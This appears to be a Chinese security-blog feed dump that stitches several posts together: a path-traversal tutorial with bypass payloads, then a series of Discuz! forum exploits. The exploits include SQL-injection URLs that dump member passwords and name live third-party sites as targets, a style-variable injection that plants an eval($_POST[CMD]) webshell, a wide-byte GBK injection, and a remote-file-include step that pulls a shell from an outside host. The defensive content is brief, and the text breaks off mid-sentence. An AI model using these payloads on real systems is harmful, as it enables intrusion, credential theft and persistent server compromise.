许多的Web应用程序一般会有对服务器的文件读取查看的功能，大多会用到提交的参数来指明文件名，形如：http://www.nuanyue.com/getfile=image.jgp

当服务器处理传送过来的image.jpg文件名后，Web应用程序即会自动添加完整路径，形如“d://site/images/image.jpg”，将读取的内容返回给访问者。

初看，在只是文件交互的一种简单的过程，但是由于文件名可以任意更改而服务器支持“~/”，“/..”等特殊符号的目录回溯，从而使攻击者越权访问或者覆盖敏感数据，如网站的配置文件、系统的核心文件，这样的缺陷被命名为路径遍历漏洞。在检查一些常规的Web应用程序时，也常常有发现，只是相对隐蔽而已。

发现路径遍历漏洞

路径遍历漏洞的发现，主要是对Web应用程序的文件读取交互的功能块，进行检测，面对这样的读取方式：

“http://www.nuanyue.com/test/downfile.jsp?filename=fan.pdf”

我们可以使用 “../”来作试探，比如提交Url：“getfile=/fan/fan/*53.pdf”，而系统在解析是“d://site/test/pdf/fan/fan/../../*53.pdf”，通过“../”跳转目录“/fan”，即“d://site/test/pdf/*53.pdf”，返回了读取文件的正常的页面。

路径遍历漏洞隐藏一般在文件读取或者展示图片功能块这样的通过参数提交上来的文件名，从这可以看出来过滤交互数据是完全有必要的。恶意攻击者当然后会利用对文件的读取权限进行跨越目录访问，比如访问一些受控制的文件，“../../../../../../../etc/passwd“或者”../../../../boot.ini“，当然现在部分网站都有类似Waf的防护设备，只要在数据中会有/etc /boot.ini等文件名出直接进行拦截。

遍历路径攻击变异

路径遍历漏洞是很常见的，在Web应用程序编写过程，会有意识的对传递过来的参数进行过滤或者直接删除，存在风险的过滤方式，一般可以采用如下方式进行突破：

以下是一些绕过的方法，当然在实际运行过程中，可以组合使用。

(1) 加密参数传递的数据；在Web应用程序对文件名进行加密之后再提交，比如：“downfile.jsp?filename= ZmFuLnBkZg- “，在参数filename用的是Base64加密，而攻击者要想绕过，只需简单的将文件名加密后再附加提交即可。所以说，采用一些有规律或者轻易能识别的加密方式，也是存在风险的。

(2)  编码绕过，尝试使用不同的编码转换进行过滤性的绕过，比如Url编码，通过对参数进行Url编码提交，“downfile.jsp?filename= %66%61%6E%2E%70%64%66“来绕过。

(3)  目录限定绕过；在有些Web应用程序是通过限定目录权限来分离的。当然这样的方法不值得可取的，攻击者可以通过某些特殊的符号“~“来绕过。形如这样的提交“downfile.jsp?filename=~/../boot”。能过这样一个符号，就可以直接跳转到硬盘目录下了。

(4)  绕过文件后缀过滤；一些Web应用程序在读取文件前，会对提交的文件后缀进行检测，攻击者可以在文件名后放一个空字节的编码，来绕过这样的文件类型的检查。例如：../../../../boot.ini%00.jpg，Web应用程序使用的Api会允许字符串中包含空字符，当实际获取文件名时，则由系统的Api会直接截短，而解析为“../../../../boot.ini”。在类Unix的系统中也可以使用Url编码的换行符，例如：../../../etc/passwd%0a.jpg如果文件系统在获取含有换行符的文件名，会截短为文件名。也可以尝试%20，例如: ../../../index.jsp%20

(5)  绕过来路验证。在一些Web应用程序中，会有对提交参数的来路进行判断的方法，而绕过的方法可以尝试通过在网站留言或者交互的地方提交Url再点击或者直接修改Http Referer即可，这主要是原因Http Referer是由客户端浏览器发送的，服务器是无法控制的，而将此变量当作一个值得信任源是错误的。

防范遍历路径漏洞

在防范遍历路径漏洞的方法中，最有效的是权限的控制，谨慎的处理向文件系统API传递过来的参数路径。主要是因为大多数的目录或者文件权限均没有得到合理的配置，而Web应用程序对文件的读取大多依赖于系统本身的API，在参数传递的过程，如果没有得严谨的控制，则会出现越权现象的出现。在这种情况下，Web应用程序可以采取以下防御方法，最好是组合使用。

(1)  数据净化，对网站用户提交过来的文件名进行硬编码或者统一编码，对文件后缀进行白名单控制，对包含了恶意的符号或者空字节进行拒绝。

(2)  Web应用程序可以使用chrooted环境访问包含被访问文件的目录，或者使用绝对路径+参数来控制访问目录，使其即使是越权或者跨越目录也是在指定的目录下。

总结

路径遍历漏洞允许恶意攻击者突破Web应用程序的安全控制，直接访问攻击者想要的敏感数据 ，包括配置文件、日志、源代码等，配合其它漏洞的综合利用，攻击者可以轻易的获取更高的权限，并且这样的漏洞在发掘上也是很容易的，只要对Web应用程序的读写功能块直接手工检测，通过返回的页面内容来判断，是很直观的，利用起来也相对简单。

影响版本：Discuz! 7.1/7.2
漏洞分析：
下面来分析下这个远程代码执行漏洞，这个问题真的很严重，可以直接写shell的：
一、漏洞来自showmessage函数：

function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) {
    extract($GLOBALS, EXTR_SKIP);//危险的用法，未初始化的变量可以直接带进函数，直接导致了问题产生，from www.oldjun.com
    global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
    define('CACHE_FORBIDDEN', TRUE);
    $hookscriptmessage = $show_message = $message;$messagehandle = 0;
    $msgforward = unserialize($_DCACHE['settings']['msgforward']);
    $refreshtime = intval($msgforward['refreshtime']);
    $refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
    $msgforward['refreshtime'] = $refreshtime * 1000;
    $url_forward = empty($url_forward) ? '' : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);
    $seccodecheck = $seccodestatus & 2;
    if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {
        $statlogfile = DISCUZ_ROOT.'./forumdata/funcstat.log';
        if($fp = @fopen($statlogfile, 'a')) {
            @flock($fp, 2);
            if(is_array($funcstatinfo)) {
                $funcstatinfo = array_unique($funcstatinfo);
                foreach($funcstatinfo as $funcinfo) {
                    fwrite($fp, funcstat_query($funcinfo, $message)."\n");
                }
            } else {
                fwrite($fp, funcstat_query($funcstatinfo, $message)."\n");
            }
            fclose($fp);
            $funcstatinfo = $GLOBALS['funcstatinfo'] = '';
        }
    }
 
    if(!defined('STAT_DISABLED') && STAT_ID > 0 && !IS_ROBOT) {
        write_statlog($message);
    }
 
    if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {
        updatesession();
        dheader("location: ".str_replace('&', '&', $url_forward));
    }
    if(!empty($infloat)) {
        if($extra) {
            $messagehandle = $extra;
        }
        $extra = '';
    }
    if(in_array($extra, array('HALTED', 'NOPERM'))) {
        $discuz_action = 254;
    } else {
        $discuz_action = 255;
    }
 
    include language('messages');
 
    $vars = explode(':', $message);//只要含:就可以了
    if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//两个数字即可，用:分割
        eval("\$show_message = \"".str_replace('"', ' \"', $scriptlang[$vars[0]][$vars[1]])."\";");//$scriptlang未初始化，可以自定义，from www.oldjun.com
    } elseif(isset($language[$message])) {
        $pre = $inajax ? 'ajax_' : '';
        eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";");
        unset($pre);
    }
 
    ......
}

二、DZ的全局机制导致了未初始化的参数可以任意提交：

foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
    foreach($$_request as $_key => $_value) {
        $_key{0} != '_' && $$_key = daddslashes($_value);
    }
}

三、misc.php正好有个可以自定义message的点，其实也是未初始化：

elseif($action == 'imme_binding' && $discuz_uid) {
 
    if(isemail($id)) {
        $msn = $db->result_first("SELECT msn FROM {$tablepre}memberfields WHERE uid='$discuz_uid'");
        $msn = explode("\t", $msn);
        $id = dhtmlspecialchars(substr($id, 0, strpos($id, '@')));
        $msn = "$msn[0]\t$id";
        $db->query("UPDATE {$tablepre}memberfields SET msn='$msn' WHERE uid='$discuz_uid'");
        showmessage('msn_binding_succeed', 'memcp.php');
    } else {
        if($result == 'Declined') {
            dheader("Location: memcp.php");
        } else {
            showmessage($response['result']);//$response没有初始化，可以自定义，
        }
    }
 
   }

[+] Founded : ZhaoHuAn
[+] Contact : ZhengXing[at]shandagames[dot]com
[+] Blog : http://www.patching.net/zhaohuan/
[+] Date : August, 26th 2009 [Double Seventh Festival]

========================[Soft Info]=========================

Software: Discuz! Plugin Crazy Star(family)
Version : 2.0
Vendor : http://www.discuz.com

[-] Exploit:
[+] 1) Register a User
2) Login!
[+] and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31 from cdb_members–

[-] SqlI PoC:
[+] http://target/[path]/plugin.php?identifier=family&module=family&action=view&fmid=1+and+1=2+unIon+selecT+ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31 from cdb_members–
[?] = Valid fmid Number

[+] Demo Live:
[-] http://sj.netease.com/plugin.php?identifier=family&module=family&action=view&fmid=6+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,group_concat(uid,0x3a,username,0x3a,password),19,20,21,22,23,24,25,26,27,28,29,30,31 from bbs_members–

[-] http://www.war3club.net/plugin.php?identifier=family&module=family&action=view&fmid=11+and+1=2+unIon+selecT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31,32,33 from cdb_members–

/———————————————www.zhaohuan.net————————————————-\

Today is the VALENTINE’S Day in China, the seventh day of the seventh lunar month.
Raise your head on August 26 and gaze at the stars, you will find something romantic going on in the sky
Greetz : Weeny <- love u more & more

\————————————————————————————————————–/

# milw0rm.com [2009-08-26]

< ?php
......
if($newcvar && $newcsubst) {
if($db->result_first("SELECT COUNT(*) FROM {$tablepre}stylevars WHERE variable='$newcvar' AND styleid='$id'")) {
cpmsg('styles_edit_variable_duplicate', '', 'error');
} elseif(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) {
cpmsg('styles_edit_variable_illegal', '', 'error');
}
$newcvar = strtolower($newcvar);
$db->query("INSERT INTO {$tablepre}stylevars (styleid, variable, substitute)
VALUES ('$id', '$newcvar', '$newcsubst')");
}//插入变量数据，From www.oldjun.com
......
updatecache('styles');//更新缓存（写文件），From www.oldjun.com
......
?>

这是为某一style风格增加变量的代码，把变量名与变量的值存入数据库，虽然post过来的数据daddslashes了，但入库之后又都是纯净的数据了。

这里涉及到一个正则问题，判断变量名的：!preg_match(“/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f- \xff]* /”, $newcvar)，其中“\x7f-\xff”是指ASCII码值在127～255之间的字符，它们经常作为中文字符的首字节出现，所以可以利用其作为中文匹配的标志。于是这个匹配貌似只是允许字母或者中文做变量名，没其他高深的匹配，随便测试了下，一般情况下这个正则等于虚设：

< ?php
$newcvar=$_GET['newcvar'];
echo $newcvar;
echo "
“;
if(!preg_match(“/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/”, $newcvar)) {
echo “haha”;
}else{
echo ‘pass’;
}
?>下面看看updatecache这个函数，在include里的cache.func.php文件里，先从数据库取出来，经过一段处理最终写入文件，具体我不描述了，我只谈谈重点，看一段函数：

function getcachevars($data, $type = ‘VAR’) {
$evaluate = ”;
foreach($data as $key => $val) {
if(is_array($val)) {
$evaluate .= “\$$key = “.arrayeval($val).”;\n”;
} else {
$val = addcslashes($val, ‘\’\\’);
$evaluate .= $type == ‘VAR’ ? “\$$key = ‘$val’;\n” : “define(‘”.strtoupper($key).”‘, ‘$val’);\n”;
}
}
return $evaluate;
}啥也不说了，处理了value没处理key，而这个key就是之前我们提交的，干净的存在数据库里的值。关于数组的key，大家可以参考下幻影旅团第三期《高级PHP代码审核技术》，那篇文章好多地方谈到key的问题，dz这里却忽视了…

于是可以直接拿shell了，利用方法（论坛地址改成自己的），先用管理员帐号登陆后台，无需论坛创始人，管理员等级即可：

http://www.oldjun.com/bbs/admincp.php?action=styles&operation=edit&id=1&adv=1

中，最下面有个“自定义模板变量”，变量中填：

OLDJUN’, ‘#999′);eval($_POST[cmd]);//替换内容随便输入：1111，然后提交，一句话木马就产生了：

http://www.oldjun.com/bbs/forumdata/cache/style_1.php

如果你修改的style的id是2的话，对于的shell就是style_2.php。

这个风格模板可以导入导出的，于是有了ring04h的那个dzshell，嫌麻烦可以直接用那个导入风格获取shell。

注：很多人反应连不上一句话，我发现我文章少说了一句：

$evaluate .= $type == ‘VAR’ ? “\$$key = ‘$val’;\n” : “define(‘”.strtoupper($key).”‘, ‘$val’);\n”;这句话是说所有的变量名换成大写的了！

因此请用大写的CMD做为你一句话的密码！

注册一个论坛ID
IE提交下面代码

blackband.php?mode=yule&action=enjoy&id=2 and 1=2 union select 1,0x2D312C67726F757069643D312C61646D696E69643D31,3,4/

提升到管理员

discuz7.0.0后台得webshell方法

http://www.oldjun.com/blog/index.php/archives/48/

如果是discuz6.0 的后台就提交
admincp.php?action=styles&edit=1
最后得到的webshell地址还是forumdata/cache/style_1.php

影响版本:
Discuz!4.0.0
Discuz!4.1.0
Discuz!5.0.0
Discuz!5.5.0
Discuz!6.0.0
Discuz!6.1.0

描述:
Discuz!论坛系统是一个采用 PHP 和 MySQL 等其他多种数据库构建的高效论坛解决方案。Discuz! 在代码质量，运行效率，负载能力，安全等级，功能可操控性和权限严密性等方面都在广大用户中有良好的口碑

由于 PHP 对 多字节字符集的支持存在问题，在各种编码相互转换过程中，有可能引发程序溢出和程序错误
提交一个 ‘
转意成 \’
然后转成gbk的，\和’就变成两个字符了
‘就可以成功的引入
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!

 
if(defined('IN_DISCUZ')) {
exit('Access Denied');
}
define('CODETABLE_DIR', DISCUZ_ROOT.'./include/tables/');
class Chinese {
var $table = '';
var $iconv_enabled = false;
var $unicode_table = array();
var $config = array
(
'SourceLang' => '',
'TargetLang' => '',
'GBtoUnicode_table' => 'gb-unicode.table',
'BIG5toUnicode_table' => 'big5-unicode.table',
);
 
function Chinese($SourceLang, $TargetLang, $ForceTable = FALSE) {
$this->config['SourceLang'] = $this->_lang($SourceLang);
$this->config['TargetLang'] = $this->_lang($TargetLang);
if(!function_exists(’iconv’) && $this->config['TargetLang'] != ‘BIG5′ && !$ForceTable) {
$this->iconv_enabled = true;
} else {
$this->iconv_enabled = false;
$this->OpenTable();
}
}
function _lang($LangCode) {
$LangCode = strtoupper($LangCode);
if(substr($LangCode, 0, 2) == ‘GB’) {
return ‘GBK’;
} elseif(substr($LangCode, 0, 3) == ‘BIG’) {
return ‘BIG5′;
} elseif(substr($LangCode, 0, 3) == ‘UTF’) {
return ‘UTF-8′;
} elseif(substr($LangCode, 0, 3) == ‘UNI’) {
return ‘UNICODE’;
}
}
 
function _hex2bin($hexdata) {
for($i=0; $i < strlen($hexdata); $i += 2) {
$bindata .= chr(hexdec(substr($hexdata, $i, 2)));
}
return $bindata;
}
 
?>
chinese.class.php (utf-8不能利用)
 
searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=1/*&do=submit
 
/space.php?username=%cf'%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,
13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,
39,40,41,42,43,44,45,46,47,48,password,50,51,52,53,54,55,56,57,database(),59,
60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,
84%20from%20cdb_members%20where%20uid=1/*
 
直接放在url后面可以爆出ｉｄ＝１的用户密码，还可以自己根据需要更改，要注意一点的是，目标必须开了WAP，而且没有打上补丁，WAP浏览吧

1.common.inc.php问题代码207行

…..
$navtitle = $navigation = ”;
$extra = isset($extra) && preg_match(“/^[&=;a-z0-9]+$/i”, $extra) ? $extra : ”;
$tpp = intval(empty($_DSESSION['tpp']) ? $topicperpage : $_DSESSION['tpp']);
$ppp = intval(empty($_DSESSION['ppp']) ? $postperpage : $_DSESSION['ppp']);
…….

提交：

http://www.discuz.net/post.php?action=newthread&fid=32&extra[]=page%3D1

返回

Warning: preg_match() expects parameter 2 to be string, array given in

/home/www/wwwroot/www.discuz.net/include/common.inc.php on line 209

2.依然是extra数组的问题
提交

http://bbs.cnbct.org/viewthread.php?tid=316&pid=1453&page=1&extra[]=page%3D1#pid1453

Warning: preg_match() expects parameter 2 to be string, array given in

/home/.cattia/bct/bbs.cnbct.org/include/common.inc.php on line 206
?
Warning: Cannot modify header information – headers already sent by (output started at

/home/.cattia/bct/bbs.cnbct.org/include/common.inc.php:206) in

/home/.cattia/bct/bbs.cnbct.org/include/global.func.php on line 139

3.global.func.php问题代码306行

function ispage($number) {
return !empty($number) && preg_match (“/^([0-9]+)$/”, $number);
}

提交：

http://www.discuz.net/viewthread.php?tid=316&pid=1453&page[]=1&extra=page%3D1#pid1453

返回

Warning: preg_match() expects parameter 2 to be string, array given in

/home/www/wwwroot/www.discuz.net/include/global.func.php on line 306

总结
当把变量当成数组提交时，如果不存在该数组，但存在变量，后面的preg_match()正则表达式匹配不了，

这样就出现了绝对路径的泄露

手工利用方法：
远程包含漏洞，变量discuz_root过滤不严，利用方法：

http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?

不一定非要txt后缀，可以改为任意后缀，后面一定要记得加问号。
这里xxxx.txt用CN.Tink的那个小马写个shell进去：
]]> http://www.nuanyue.com/discuz%e8%ae%b8%e6%84%bf%e6%b1%a0%e6%8f%92%e4%bb%b6%e8%bf%9c%e7%a8%8b%e5%8c%85%e5%90%ab%e6%bc%8f%e6%b4%9e.html/feed 0